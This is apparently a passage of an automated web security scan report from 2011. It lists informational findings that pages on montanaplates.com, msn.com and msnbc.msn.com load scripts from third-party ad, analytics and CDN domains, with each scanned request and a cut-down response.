<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.757. http://www.montanaplates.com/privacy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.montanaplates.com
Path:	/privacy.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /privacy.html HTTP/1.1
Host: www.montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:33:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.758. http://www.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msn.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.msn.com
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; stvx=gendermodule:forher

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:22:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA03
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 83838
Content-Length: 83838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...

18.759. http://www.msn.com/defaultwpe7.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msn.com
Path:	/defaultwpe7.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://tk2.stj.s-msn.com/br/hp/11/en-us/js/404_1.js

Request

GET /defaultwpe7.aspx HTTP/1.1
Host: www.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 16:03:34 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA34
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
STATUS_CODE: NotFound
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 14366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
</div><script type="text/javascript" src="http://tk2.stj.s-msn.com/br/hp/11/en-us/js/404_1.js"></script>
...[SNIP]...

18.760. http://www.msn.com/sck.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msn.com
Path:	/sck.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://col.stj.s-msn.com/br/sc/js/1c/4a0253de6eac448d8f2c39c53f8926.js

Request

GET /sck.aspx HTTP/1.1
Host: www.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:03:35 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA43
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 2568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/1c/4a0253de6eac448d8f2c39c53f8926.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...

18.761. http://www.msn.com/worldwide.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msn.com
Path:	/worldwide.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js

Request

GET /worldwide.aspx HTTP/1.1
Host: www.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:03:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...

18.762. http://www.msnbc.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery.cycle/2.88/jquery.cycle.all.min.js
http://content.pulse360.com/91263EC8-A727-11DF-BD32-51423FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET / HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Wed, 02 Feb 2011 16:03:36 GMT
Date: Wed, 02 Feb 2011 16:03:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 209957

<html><head><title>Breaking News, Weather, Business, Health, Entertainment, Sports, Politics, Travel, Science, Technology, Local, US & World News - msnbc.com</title><link rel="stylesheet" type="te
...[SNIP]...
</script><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...

<script src="http://ajax.microsoft.com/ajax/jquery.cycle/2.88/jquery.cycle.all.min.js" type="text/javascript"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/91263EC8-A727-11DF-BD32-51423FF5047F" type="text/javascript"></script>
...[SNIP]...

18.763. http://www.msnbc.msn.com/id/3032072/ns/business previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032072/ns/business

Issue detail

The response dynamically includes the following script from another domain:

http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032072/ns/business HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.764. http://www.msnbc.msn.com/id/3032076/ns/health previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032076/ns/health

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.pulse360.com/034CFD04-A960-11DF-9090-D37F3FF5047F
http://content.pulse360.com/27EE5888-A95B-11DF-B5E2-BA6C3FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032076/ns/health HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Wed, 02 Feb 2011 16:03:40 GMT
Date: Wed, 02 Feb 2011 16:03:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 170627

<html><head><title>Health, Diet and Nutrition News & Information - Read Current Articles, Men's, Women's and Children Health - MSNBC.com- msnbc.com</title><link rel="stylesheet" type="text/css" hr
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.msn.com/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/034CFD04-A960-11DF-9090-D37F3FF5047F" type="text/javascript"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/27EE5888-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...

18.765. http://www.msnbc.msn.com/id/3032118/ns/technology_and_science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032118/ns/technology_and_science

Issue detail

The response dynamically includes the following script from another domain:

http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032118/ns/technology_and_science HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.766. http://www.msnbc.msn.com/id/3032507/ns/world_news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032507/ns/world_news

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032507/ns/world_news HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Wed, 02 Feb 2011 16:03:36 GMT
Date: Wed, 02 Feb 2011 16:03:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 164243

<html><head><title>World News - Daily International Stories from Around the World- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/cs
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.msn.com/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...

18.767. http://www.msnbc.msn.com/id/3032525/ns/us_news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032525/ns/us_news

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032525/ns/us_news HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Wed, 02 Feb 2011 16:03:36 GMT
Date: Wed, 02 Feb 2011 16:03:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 165723

<html><head><title>US News - Current Education, Business and Security Headlines from Across the US- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="styleshe
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.msn.com/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...

18.768. http://www.msnbc.msn.com/id/3032553/ns/politics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032553/ns/politics

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.pulse360.com/0376BB26-A960-11DF-9090-D37F3FF5047F
http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032553/ns/politics HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Wed, 02 Feb 2011 16:03:38 GMT
Date: Wed, 02 Feb 2011 16:03:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 144709

<html><head><title>Politics - Political News & Updates- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.msn.com/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/0376BB26-A960-11DF-9090-D37F3FF5047F" type="text/javascript"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...

18.769. http://www.msnbc.msn.com/id/3032619/ns/nightly_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/3032619/ns/nightly_news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/node.pli?pub=starcomCustom
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032619/ns/nightly_news/ HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.770. http://www.msnbc.msn.com/id/41274431/ns/world_news-weird_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41274431/ns/world_news-weird_news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41274431/ns/world_news-weird_news/?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.771. http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41292533/ns/technology_and_science-science/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7543
http://service.collarity.com/cust/msnbc/ucs.js

Request

Response

18.772. http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41299984/ns/health-cancer/from/toolbar

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7542
http://service.collarity.com/cust/msnbc/ucs.js

Request

Response

18.773. http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41354775/ns/business-business_of_super_bowl_xlv/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7540
http://service.collarity.com/cust/msnbc/ucs.js

Request

Response

18.774. http://www.msnbc.msn.com/id/41357424/ns/health-kids_and_parenting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41357424/ns/health-kids_and_parenting

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7542
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41357424/ns/health-kids_and_parenting HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.775. http://www.msnbc.msn.com/id/41359879/ns/us_news-life/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41359879/ns/us_news-life/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41359879/ns/us_news-life/?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.776. http://www.msnbc.msn.com/id/41360579/ns/us_news-crime_and_courts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41360579/ns/us_news-crime_and_courts

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41360579/ns/us_news-crime_and_courts HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.777. http://www.msnbc.msn.com/id/41362386/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41362386/ns/local_news-dallasfort_worth_tx/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41362386/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.778. http://www.msnbc.msn.com/id/41362578/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41362578/ns/local_news-dallasfort_worth_tx/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41362578/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.779. http://www.msnbc.msn.com/id/41363059/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41363059/ns/local_news-dallasfort_worth_tx/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41363059/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.780. http://www.msnbc.msn.com/id/41363738/ns/weather previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41363738/ns/weather

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=9445
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41363738/ns/weather HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.781. http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41363935/ns/world_news-mideastn_africa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

Response

18.782. http://www.msnbc.msn.com/id/41364449/ns/world_news-the_new_york_times previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41364449/ns/world_news-the_new_york_times

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41364449/ns/world_news-the_new_york_times HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

